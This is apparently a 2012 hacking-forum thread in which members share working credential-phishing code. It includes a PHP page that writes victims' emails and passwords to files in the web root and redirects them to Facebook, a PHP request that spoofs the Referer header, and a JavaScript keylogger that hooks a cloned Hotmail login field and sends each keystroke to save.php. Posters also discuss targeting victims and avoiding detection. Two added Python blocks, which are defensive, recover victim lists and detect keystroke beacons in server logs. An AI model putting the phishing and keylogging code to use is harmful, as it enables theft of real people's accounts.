bobbyb1980 Posted February 14, 2012

Hey guys. Thought I would post a little thing I've been working on. This is a .php page that phishes. When you go to this page, and if all happens like it's supposed to happen, when the user inputs their credentials it will take those credentials and output them as both a .xml and a .txt document in the root dir of the server. After that there is a JavaScript redirect, so as long as the victim has JavaScript installed it should redirect them. If you'd like to use this script for other pages like Gmail or whatever, you should be able to clone whatever website you want using a clone script. Once the site is cloned you can copy/paste the PHP and JavaScript chunk of code to the top of the index of the site. I'm a giant n00b so any suggestions are appreciated.

<?php
if (isset($_POST['submit'])) {
    // Load the XML file (it must already exist and contain a root element).
    $xml = simplexml_load_file("userFile.xml");
    // Create a SimpleXMLElement object from the source of the XML file.
    $sxe = new SimpleXMLElement($xml->asXML());

    // Add a new child and other children inside the child just created.
    $person = $sxe->addChild("users");
    $person->addChild("userEmail", $_POST["email"]);
    $person->addChild("pass", $_POST["pass"]);

    // Overwrite the original XML file with the new data added.
    $sxe->asXML("userFile.xml");

    // Append the same data to a plain-text file, one record per line.
    $ourFileName = "userFile.txt";
    $fh = fopen($ourFileName, 'a') or die("can't open file");
    $stringData = "User Email:" . $_POST["email"] . "\t";
    fwrite($fh, $stringData);
    $stringData = "Password:" . $_POST["pass"] . "\n";
    fwrite($fh, $stringData);
    fclose($fh);
?>
<script>
location.href = "https://www.facebook.com/login.php?login_attempt=1";
</script>
<?php
}
?>
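As an added example, not code from bobbyb1980's post: the script above writes its harvest to userFile.xml and userFile.txt in the web root, where anyone who finds the page can fetch them too, which is how incident responders usually recover a kit's victim list. The Python below was written for this page and assumes the layout the script produces (a root element, whose name is an assumption, holding <users> children with <userEmail> and <pass>; and "User Email:<addr>\tPassword:<pw>" records in the text file). It parses both files, merges and deduplicates the accounts, and masks the passwords so the list can be handled for victim notification without spreading the plaintext further. The sample files are constructed.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample of userFile.xml in the layout the PHP script writes.
# The root element name "root" is an assumption; the script only needs one to exist.
SAMPLE_XML = """<?xml version="1.0"?>
<root>
  <users><userEmail>alice@example.com</userEmail><pass>hunter2</pass></users>
  <users><userEmail>bob@example.com</userEmail><pass>Pa$$w0rd!</pass></users>
</root>
"""

# Constructed sample of userFile.txt exactly as the script appends it:
# "User Email:<addr>\tPassword:<pw>" followed by a separator (tab or newline).
SAMPLE_TXT = (
    "User Email:alice@example.com\tPassword:hunter2\t"
    "User Email:carol@example.com\tPassword:letmein\t"
)

# A password containing a tab would be cut short here; the kit's format cannot express it.
TXT_RECORD = re.compile(r"User Email:(?P<email>[^\t\n]*)\tPassword:(?P<pw>[^\t\n]*)")


def parse_xml(text: str) -> List[Dict[str, str]]:
    """Return [{'email': ..., 'password': ...}] from a userFile.xml document."""
    root = ET.fromstring(text)
    records = []
    for node in root.findall("users"):
        email = (node.findtext("userEmail") or "").strip()
        pw = node.findtext("pass") or ""
        if email:
            records.append({"email": email, "password": pw})
    return records


def parse_txt(text: str) -> List[Dict[str, str]]:
    """Return the same structure from a userFile.txt log."""
    return [
        {"email": m.group("email").strip(), "password": m.group("pw")}
        for m in TXT_RECORD.finditer(text)
        if m.group("email").strip()
    ]


def mask(pw: str) -> str:
    """Keep only the length and first character so reuse can be spotted without the plaintext."""
    if not pw:
        return "<empty>"
    return pw[0] + "*" * (len(pw) - 1)


def victim_list(xml_text: str, txt_text: str) -> Dict[str, str]:
    """Merge both loot files into {email: masked_password}, deduplicated by email (case-insensitive)."""
    merged: Dict[str, str] = {}
    for rec in parse_xml(xml_text) + parse_txt(txt_text):
        merged.setdefault(rec["email"].lower(), mask(rec["password"]))
    return merged


if __name__ == "__main__":
    for email, masked in sorted(victim_list(SAMPLE_XML, SAMPLE_TXT).items()):
        print(f"{email}\t{masked}")
```

The text-file regex stops a record at a tab or newline, so it reads both the file as the script appends it and one that ends each record with a newline.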
kurtm Posted February 14, 2012

Thanks. But I have an idea so that the user will not detect that it is phishing: how about, once the victim logs in, the credentials are saved and the redirect truly redirects them as if they had already logged in to the site, e.g. Facebook? Can anyone do that?
Sebkinne Posted February 14, 2012

That is potentially possible, but I could imagine that Facebook and the likes have referrer checks.
Darren Kitchen Posted February 14, 2012

Sounds interesting. How exactly are the sites cloned? I once put together a quick and dirty PHP script, similar to the redirect that ships on the MK3, which would serve up a nearly blank HTML document with a background image set as a slightly modified version of the website. Then an absolute div would place the HTML form elements for login. The PHP script would specify the JPG to use as well as the X and Y for username, password and login button. Cheap, I know, but very quick to make very basic phishing sites. I had picked the top 10 sites on Alexa and was working on getting the top 100 done before I got distracted by another project.
kurtm Posted February 15, 2012

Darren, can you share that with us? Thanks.
Hyperant Posted February 15, 2012

"That is potentially possible, but I could imagine that Facebook and the likes have referrer checks."

Facebook does check the referrer, whereas Hotmail doesn't. Unless you can find a way to change the referrer address, sites like Facebook will detect the login and alert the user (which you don't want to happen if it's a phishing page). With that said, though, you could use something like this in order to pass the login information on to the site and then load the page inside your own page.

http://www.mustap.com/phpzone_post_62_how-to-bypass-the-referer-se

<?php
// the site we want to attack
$host = "www.mysite.com";
// the file we want to attack
$file = "formprocess.php";
// the form body we want to submit
$body = "username=mustap&comment=NOCOMMENT";

// construct a header for our request; the Referer is set here so the
// target sees the request as coming from its own site
$hdrs = array(
    'http' => array(
        'method'  => "POST",
        'header'  => "Accept-Language: en\r\n" .
                     "Host: $host\r\n" .
                     "Referer: http://$host\r\n" .   // setting the HTTP Referer
                     "Content-Type: application/x-www-form-urlencoded\r\n" .
                     "Content-Length: " . strlen($body) . "\r\n",
        'content' => $body                           // the POST body itself
    )
);

// get the requested page from the server
// with our header as a request header
$context = stream_context_create($hdrs);
$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);
fpassthru($fp);
fclose($fp);
?>
kurtm Posted February 15, 2012

I have an idea to do this. How about a JavaScript keylogger?
Hyperant Posted February 15, 2012

"I have an idea to do this. How about a JavaScript keylogger?"

What, something like this? (This works on Hotmail: save the source code for the Hotmail login page, then add this to it. You also need to add setupXML(); changePost(); to the body onLoad event.)

<script>
// AJAX
var xhr = false;
var url = 'save.php?key=';

// Set up and load the XMLHttpRequest object
function setupXML() {
    // Load the XMLHttpRequest for everything but IE
    if (window.XMLHttpRequest) {
        try {
            xhr = new XMLHttpRequest();
        } catch (e) {
            xhr = false;
        }
    } else {
        try {
            xhr = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            xhr = false;
        }
    }
    // Make sure we have an XMLHttpRequest object loaded into memory
    if (xhr) {
        xhr.onreadystatechange = processXHR;
    }
}

// The server's response is not needed, so nothing is done with it
function processXHR() {
}
</script>
<script>
function changePost() {
    // Hook the password input field (id i0118 on the Hotmail login page)
    document.getElementById('i0118').onkeydown = function (e) {
        var key = '';
        if (e.charCode) key = e.charCode;
        else key = e.keyCode;
        try {
            // Send each key press to save.php as it happens
            xhr.open('GET', url + String.fromCharCode(key) + ' : ' + key, true);
            xhr.send('');
        } catch (e) {
        }
    }
}
</script>

What it does is hook the password input field; then, with every key press that gets entered into that input field, it sends it to another PHP script on the server so that it can save the keystrokes.
kurtm Posted February 16, 2012

But the problem with the keylogger: yes, it keylogs when one visitor types, but if two or more type at the same time the letters become scrambled. Can it record every keystroke with the IP address? Example:

user 1 - 192.168.1.30 login pass
user 2 - 192.168.1.34 login pass
user 3 - 192.168.1.35 login pass

Next problem: what if the login and password are auto-filled, so users will not type them in?
Hyperant Posted February 16, 2012

"But the problem with the keylogger: yes, it keylogs when one visitor types, but if two or more type at the same time the letters become scrambled. Can it record every keystroke with the IP address? Example: user 1 - 192.168.1.30 login pass; user 2 - 192.168.1.34 login pass; user 3 - 192.168.1.35 login pass. Next problem: what if the login and password are auto-filled, so users will not type them in?"

It's not really an issue if more than one person is typing at the same time. On the PHP side of things that stores the password for you, all you have to do is use a $_SESSION or something else to determine each user, or, like you said, the IP address. Me personally, I would use the IP address as the file name that the password is written to. (But with that said, this is used as a phishing page and I would only use it as a targeted attack. What I mean by that is that the fake login page they see will automatically have their username inserted within it. If you're targeting, say, Hotmail, then the fake page that you use can be a login page that tells the user their session has expired, which Hotmail has, and they place the user's email address in the username field for them already, which means if you use that page then you also need to do the same thing. Do you see what I mean when I say it's more of a targeted attack and not meant for just a random attack? But with that said, it could also work as a random attack.) As for the auto fill, well, I'll let you work that out. I mean, shit, I've already posted code on how to bypass the referrer and now some code that's a JavaScript keylogger. Read up on how the auto fill systems in browsers work and see if you can work out how to get around that; I can think of a few ways just off the top of my head ;) /me isn't doing all the work for you

Edited February 16, 2012 by Hyperant
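As an added example, not code from Hyperant's or kurtm's posts: the keylogger above turns every key press into a separate GET to save.php?key=<char> : <code>, so besides feeding the kit it leaves a very recognisable trail in the web server's own access log. The Python below, written for this page, assumes Apache combined-format log lines and the exact URL shape the script builds, and shows two things a practitioner wants from that trail: a detection rule that flags a client issuing several single-character beacons within a few seconds, and the per-client reassembly kurtm asked about, grouping by source IP and ordering by time so two victims typing at the same moment no longer scramble together. The log lines, hostnames and addresses are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Set
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format log lines (not real traffic): two clients
# typing into the hooked field at the same time, plus unrelated requests.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Feb/2012:10:00:04 +0000] "GET /save.php?key=H%20:%2072 HTTP/1.1" 200 0 "http://phish.example/index.php" "Mozilla/5.0"
10.0.0.9 - - [15/Feb/2012:10:00:04 +0000] "GET /save.php?key=S%20:%2083 HTTP/1.1" 200 0 "http://phish.example/index.php" "Mozilla/5.0"
10.0.0.5 - - [15/Feb/2012:10:00:05 +0000] "GET /save.php?key=U%20:%2085 HTTP/1.1" 200 0 "http://phish.example/index.php" "Mozilla/5.0"
10.0.0.9 - - [15/Feb/2012:10:00:05 +0000] "GET /save.php?key=E%20:%2069 HTTP/1.1" 200 0 "http://phish.example/index.php" "Mozilla/5.0"
10.0.0.5 - - [15/Feb/2012:10:00:05 +0000] "GET /save.php?key=N%20:%2078 HTTP/1.1" 200 0 "http://phish.example/index.php" "Mozilla/5.0"
10.0.0.9 - - [15/Feb/2012:10:00:06 +0000] "GET /save.php?key=C%20:%2067 HTTP/1.1" 200 0 "http://phish.example/index.php" "Mozilla/5.0"
10.0.0.7 - - [15/Feb/2012:10:00:30 +0000] "GET /save.php?key=A%20:%2065 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)


class Hit(NamedTuple):
    ip: str
    ts: datetime
    url: str


class Keystroke(NamedTuple):
    ip: str
    ts: datetime
    char: str
    code: int


def parse_log(text: str) -> List[Hit]:
    """Parse combined-format lines into Hit records; lines that do not match are skipped."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        hits.append(Hit(m.group("ip"), ts, m.group("url")))
    return hits


def keystroke_events(hits: List[Hit], endpoint: str = "/save.php", param: str = "key") -> List[Keystroke]:
    """Pick out beacons shaped like the keylogger's GET save.php?key=<char> : <code>."""
    events = []
    for hit in hits:
        parsed = urlparse(hit.url)
        if parsed.path != endpoint:
            continue
        values = parse_qs(parsed.query).get(param)  # parse_qs also URL-decodes %20
        if not values:
            continue
        parts = values[0].split(" : ", 1)
        if len(parts) != 2 or len(parts[0]) != 1 or not parts[1].isdigit():
            continue
        events.append(Keystroke(hit.ip, hit.ts, parts[0], int(parts[1])))
    return events


def per_client(events: List[Keystroke]) -> Dict[str, str]:
    """Reassemble each client's keystrokes in time order so concurrent victims do not interleave."""
    buckets: Dict[str, List[Keystroke]] = defaultdict(list)
    for ev in events:
        buckets[ev.ip].append(ev)
    # sorted() is stable, so beacons sharing a timestamp keep their log order
    return {ip: "".join(ev.char for ev in sorted(evs, key=lambda e: e.ts))
            for ip, evs in buckets.items()}


def flag_bursts(events: List[Keystroke], min_keys: int = 3,
                window: timedelta = timedelta(seconds=10)) -> Set[str]:
    """Detection rule: flag any client that sent min_keys or more beacons inside one window."""
    flagged: Set[str] = set()
    by_ip: Dict[str, List[datetime]] = defaultdict(list)
    for ev in events:
        by_ip[ev.ip].append(ev.ts)
    for ip, times in by_ip.items():
        times.sort()
        for i in range(len(times)):
            # count beacons landing in [times[i], times[i] + window]
            if sum(1 for t in times[i:] if t - times[i] <= window) >= min_keys:
                flagged.add(ip)
                break
    return flagged


if __name__ == "__main__":
    evs = keystroke_events(parse_log(SAMPLE_LOG))
    print("flagged:", sorted(flag_bursts(evs)))
    for ip, typed in sorted(per_client(evs).items()):
        print(ip, len(typed), "keystrokes")
```

The same grouping by source IP is what the kit's save.php would have to do to keep victims apart; seen from the defender's side it is also how a single access log tells you which clients were exposed and how much was captured from each.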